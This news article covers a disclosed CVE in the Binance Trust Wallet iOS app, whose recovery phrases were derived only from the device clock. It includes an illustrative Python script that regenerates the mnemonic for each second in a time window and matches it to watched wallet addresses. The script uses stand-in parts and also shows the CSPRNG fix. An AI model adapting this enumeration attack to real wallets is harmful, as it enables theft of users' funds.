The National Institute of Standards and Technology (NIST) is analysing a reported vulnerability in the iOS app ‘Binance Trust Wallet’. The flaw could expose users to theft of funds through guessing of the wallet’s mnemonic (recovery) words.
Details of the flaw and implications
Registered on February 8 in the CVE database, the public catalogue of disclosed security vulnerabilities, the flaw is currently awaiting analysis by NIST’s National Vulnerability Database, which assesses its real-world severity and assigns a score. The vulnerability has already been exploited: attackers systematically generated the mnemonic that the app would have produced for every timestamp within the relevant period and linked each one to specific wallet addresses in order to steal funds.
The CVE record describes the flaw as follows: the Binance Trust Wallet app for iOS in commit 3cd6e8f647fbba8b5d8844fcd144365a086b629f, git tag 0.0.4, misuses the trezor-crypto library and therefore generates mnemonics for which the device’s time is the only source of entropy, leading to financial losses, as exploited in July 2023. An attacker can systematically generate mnemonics for each timestamp within a given period, and link them to specific wallet addresses to steal funds from those wallets. The difference is stark: a mnemonic backed by 128 bits of genuine randomness cannot be guessed, whereas one derived solely from a second-resolution clock has only as many candidates as there are seconds in the window during which the wallet could have been created, roughly 31.5 million per year, well within reach of a single machine.
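The following is an added illustration of the attack described above, not code from the Trust Wallet app or from trezor-crypto. It models the flaw as "128 bits of entropy that are a deterministic function of the Unix timestamp" (the exact generator in the affected build is not described on this page, so Python's seeded Mersenne Twister stands in for it), implements the genuine BIP39 entropy-to-word-index mapping, and replaces the real seed-to-address derivation (PBKDF2, BIP32, secp256k1) with a hypothetical one-way `wallet_id` hash, which is enough to show how an attacker who watches a set of addresses recovers the victim's creation time and mnemonic by walking a window of timestamps. The wordlist is a constructed stand-in for the official 2048-word BIP39 English list, and the victim timestamp is likewise constructed.

```python
"""Time-seeded mnemonic weakness: vulnerable generator, hardened form, and the
timestamp-enumeration attack (added example, not the affected app's code)."""
import hashlib
import math
import random
import secrets

# Constructed stand-in for the 2048-word BIP39 English list. Only the first
# four entries match the real list ("abandon", "ability", "able", "about");
# a real implementation must load the official list.
WORDLIST = ["abandon", "ability", "able", "about"] + [f"word{i:04d}" for i in range(4, 2048)]


def mnemonic_indices(entropy: bytes) -> list[int]:
    """BIP39: append ENT/32 checksum bits (leading bits of SHA-256(entropy)),
    then split the bit string into 11-bit word indices."""
    ent_bits = len(entropy) * 8
    if ent_bits not in (128, 160, 192, 224, 256):
        raise ValueError("entropy must be 16, 20, 24, 28 or 32 bytes")
    cs_bits = ent_bits // 32
    checksum = hashlib.sha256(entropy).digest()[0] >> (8 - cs_bits)
    bits = (int.from_bytes(entropy, "big") << cs_bits) | checksum
    total = ent_bits + cs_bits
    return [(bits >> (total - 11 * (i + 1))) & 0x7FF for i in range(total // 11)]


def mnemonic_words(entropy: bytes) -> str:
    return " ".join(WORDLIST[i] for i in mnemonic_indices(entropy))


def weak_entropy(unix_time: int) -> bytes:
    """ASSUMED model of the flaw: the 128 'random' bits depend only on the
    device clock in seconds. Modelled with a PRNG seeded by the timestamp; the
    affected build used a different generator, but the property that matters
    is identical: one timestamp maps to exactly one mnemonic."""
    return random.Random(unix_time).getrandbits(128).to_bytes(16, "big")


def strong_entropy() -> bytes:
    """Hardened form: 128 bits from the operating system's CSPRNG."""
    return secrets.token_bytes(16)


def wallet_id(entropy: bytes) -> str:
    """Hypothetical stand-in for mnemonic -> seed -> BIP32 -> address. For the
    attack it only has to be a deterministic, one-way function of the entropy."""
    return hashlib.sha256(b"wallet-id:" + entropy).hexdigest()[:40]


def recover_by_timestamp(target_ids: set[str], start: int, end: int) -> dict[str, tuple[int, str]]:
    """Attacker side: for every second in [start, end], regenerate the mnemonic
    the vulnerable app would have produced, derive its address, and report any
    match against the watched addresses as (creation timestamp, mnemonic)."""
    hits: dict[str, tuple[int, str]] = {}
    for ts in range(start, end + 1):
        ent = weak_entropy(ts)
        wid = wallet_id(ent)
        if wid in target_ids:
            hits[wid] = (ts, mnemonic_words(ent))
    return hits


def search_space_bits(window_seconds: int) -> float:
    """Effective entropy of a time-seeded mnemonic: log2 of the number of
    seconds the attacker must try, instead of the nominal 128 bits."""
    return math.log2(window_seconds)


if __name__ == "__main__":
    victim_created_at = 1689000000  # constructed: a second in July 2023
    victim_addr = wallet_id(weak_entropy(victim_created_at))
    # The attacker knows only the address and that the wallet was created that day.
    day = 24 * 3600
    hits = recover_by_timestamp({victim_addr}, victim_created_at - day // 2, victim_created_at + day // 2)
    ts, words = hits[victim_addr]
    print(f"recovered creation time {ts}, mnemonic: {words}")
    print(f"one year of timestamps is only {search_space_bits(365 * day):.1f} bits of entropy")
```

Running the block recovers the constructed victim's mnemonic from a one-day window in a few seconds; with the real BIP39 list and address derivation the loop is slower per candidate but the search space is the same. The `strong_entropy` path shows the fix: draw the 16 bytes from the OS CSPRNG so that no timestamp, or any other predictable value, determines the words.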
Consequences for Trust Wallet
Trust Wallet fell victim to multiple cyber incidents in 2023, resulting in losses of over $4 million. Acquired by Binance in 2018, Trust Wallet now operates as a separate legal entity independent of Binance.com, according to a Binance spokesperson. To date, Trust Wallet has not addressed this vulnerability on its X profile, and Binance has since launched its own Web3 wallet.